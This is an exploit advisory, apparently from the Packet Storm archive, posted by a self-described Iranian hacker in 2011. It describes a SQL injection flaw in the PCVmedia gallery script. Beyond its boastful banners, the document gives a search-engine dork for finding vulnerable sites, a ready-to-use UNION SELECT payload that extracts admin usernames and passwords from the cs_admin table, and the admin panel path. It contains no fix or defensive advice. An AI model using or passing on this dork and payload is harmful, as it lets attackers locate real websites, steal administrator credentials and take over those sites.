PCVmedia SQL Injection

2011-08-12T00:00:00
ID PACKETSTORM:104015
Type packetstorm
Reporter Ehsan_Hp200
Modified 2011-08-12T00:00:00

Description

                                        
                                            `################################ IRANIAN THE BEST HACKERS IN THE WORLD ##################  
#################### ####################  
##  
## Remote SQL injection Vulnerability  
##  
## PCVmedia (free_gallery.php?cat_id)  
##   
###############################################################  
###############################################################  
###############################################################  
###############################################################  
##  
## AuTh0r : Ehsan_Hp200  
##  
## H0ME : www.ehsanhp.blogsky.com  
##  
## Email : Ehsan_Hp200@Hotmail.com  
##   
## Vendor : http://www.pcvmedia.com/  
##   
## Persian Gulf 4 Ever!  
#############################  
#############################  
#############################  
#############################  
#############################  
##  
##  
  
Dork : "Website designed & developed by PCVmedia.com" "inurl:free_gallery.php?cat_id="  
  
Exploite:  
  
www.victim.com/free_gallery.php?cat_id=-1 union select 1,2,concat(username,0x3,password),4,5,6 from cs_admin  
  
#########################################################################################  
  
Admin Panel : www.victim.com/admin  
  
#########################################################################################  
SpeCial TanX To : Dj7Xpl , Skote_Vahshat  
##########################################################################################  
############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################   
`